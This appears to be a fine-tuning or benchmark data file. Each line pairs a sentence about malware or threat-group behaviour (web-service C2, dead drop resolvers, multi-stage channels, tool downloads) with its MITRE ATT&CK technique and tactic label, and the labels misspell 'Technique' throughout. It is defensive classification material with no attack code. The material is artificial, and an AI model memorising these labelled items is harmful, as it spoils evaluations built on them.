+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader has the ability to download malware from Google Drive.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has downloaded scripts from GitHub.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has used web services including Paste.ee to host payloads.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has used a legitimate web service for evading detection.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has used a legitimate compromised website to download DLLs to the victim's machine.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can download additional payloads from web services including Pastebin and top4top.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has used Amazon Web Services to host second-stage servers.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can download additional payloads hosted on a Discord channel.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ngrok has been used by threat actors to proxy C2 connections to ngrok service subdomains.,"Tecnique: T1102 Web Service, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.","Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.","Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER's MSGET downloader uses a dead drop resolver to access malicious payloads.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS collects C2 information via a dead drop resolver.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can retrieve C2 domain information from actor-controlled S3 buckets.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can obtain C2 information from Google Docs.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali can read C2 information from Google Documents and YouTube.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The KEYPLUG Windows variant has retrieved C2 addresses from encoded data in posts on tech community forums.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used YouTube to store and hide C&C server domains.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX uses Pastebin to store C2 addresses.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL.","Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.,"Tecnique: T1102.001 Web Service: Dead Drop Resolver, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Ghost, APT29 used social media platforms to hide communications to C2 servers.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has used blogs and WordPress for C2 infrastructure.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used Google Drive for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has communicated with C2 through files uploaded to and downloaded from DropBox.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has used a VBScript named ""ggldr"" that uses Google Apps Script, Sheets, and Forms services for C2.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used cloud services, including OneDrive, for C2.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used Blogspot pages for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware can use a SOAP Web service to communicate with its C2 server.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used web services including OneHub to distribute remote access tools.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has used OneDrive and DropBox for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Turla JavaScript backdoor has used Google Apps Script as its C2 server.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE has also obfuscated its C2 traffic as normal traffic to sites such as Github.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can use different cloud providers for its C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon has used DropBox for C2 communications.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The CALENDAR malware communicates through the use of events in Google Calendar.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can use Dropbox to download malicious payloads, send commands, and receive information.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CozyCar uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can use OneDrive for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can use Dropbox to receive commands and upload stolen data.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use Dropbox and GitHub for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GLOOXMAIL communicates to servers operated by Google using the Jabber/XMPP protocol.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can utilize web services including Google sites to send and receive C2 data.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KARAE can use public cloud-based storage providers for command and control.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar has used compromised WordPress blogs as C2 servers.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LOWBALL uses the Dropbox cloud storage service for command and control.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz has used Technet and Pastebin web pages for command and control.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POORAIM has used AOL Instant Messenger for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerStallion uses Microsoft OneDrive as a C2 server via a network drive mapped with net use.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT has used legitimate social networking sites and cloud platforms (including but not limited to Twitter, Yandex, Dropbox, and Mediafire) for C2 communications.","Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can use Dropbox as its C2 server.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT used blogpost.com as its primary command and control server during a campaign.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin has used Google Drive as a Command and Control channel.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWDRIFT uses cloud based services for C2.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve has the ability to use the Telegram Bot API from Telegram Messenger to send and receive messages.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty communicates to the C2 server by retrieving a Google Doc.,"Tecnique: T1102.002 Web Service: Bidirectional Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.,"Tecnique: T1102.003 Web Service: One-Way Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.,"Tecnique: T1102.003 Web Service: One-Way Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The ""tDiscoverer"" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.","Tecnique: T1102.003 Web Service: One-Way Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has downloaded a zip file for execution on the system.,"Tecnique: T1102.003 Web Service: One-Way Communication, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OnionDuke uses Twitter as a backup C2.,"Tecnique: T1102.003 Web Service: One-Way Communication, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT3 downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.","Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.,"Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used multi-stage malware components that inject later stages into separate processes.,"Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.","Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs ""louder"" interactions with the malware.","Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.","Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Bazar loader is used to download and execute the Bazar backdoor.,"Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After initial compromise, Chaos will download a second stage to establish a more permanent presence on the affected system.","Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can download and execute additional payloads and modules over separate communication channels.,"Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Individual Uroburos implants can use multiple communication channels based on one of four available modes of operation.,"Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can download additional modules and malware capable of using separate C2 channels.,"Tecnique: T1104 Multi-Stage Channels, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0010, UNC3890 actors downloaded tools and malware onto a compromised host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors downloaded additional tools and files onto a compromised network.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 downloaded malicious payloads onto compromised systems.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors downloaded additional tools and files onto victim machines.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0026, the threat actors downloaded malicious payloads onto select compromised hosts.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider downloaded tools using victim organization systems.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors leveraged exploits to download remote files to Ivanti Connect Secure VPNs.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors downloaded files and tools onto a victim machine.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors downloaded additional droppers and backdoors onto a compromised system.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used administrative utilities to deliver Trojan components to remote systems.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors downloaded additional malware and malicious scripts onto a compromised host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors downloaded additional files to the infected system.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 downloaded additional malware, such as TEARDROP and Cobalt Strike, onto a compromised host following initial access.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 can upload a file to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has downloaded additional tools and malware onto compromised networks.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can copy files to remote machines.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has downloaded additional files and programs from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has downloaded second stage malware from compromised websites.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has downloaded tools to compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used certutil to download additional files. APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has downloaded additional tools and malware onto compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has downloaded additional malware onto compromised hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has downloaded additional malware and tools onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has remotely copied tools and malware onto targeted systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has downloaded files, including Cobalt Strike, to compromised hosts.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has downloaded additional files and payloads onto a compromised host following initial access.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used first-stage payloads that download additional malware from C2 servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has copied and installed tools for operations once in the victim environment.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used tools to download malicious code.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum can deploy additional components or tools as needed.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has downloaded additional tools and malware to compromised systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
